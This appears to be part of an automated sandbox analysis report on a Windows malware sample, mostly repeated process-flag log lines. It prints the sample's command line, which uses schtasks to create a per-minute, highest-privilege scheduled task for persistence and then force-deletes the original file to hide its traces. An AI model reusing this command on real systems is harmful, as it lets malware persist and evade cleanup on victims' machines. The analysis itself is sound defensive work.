                      Source: C:\Users\user\AppData\Roaming\manager.exeFile created: C:\Users\user\AppData\Roaming\XenoManager\manager.exeJump to dropped file
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeFile created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile created: C:\Users\user\AppData\Roaming\manager.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Self deletion via cmd or bat file
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"Jump to behavior
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
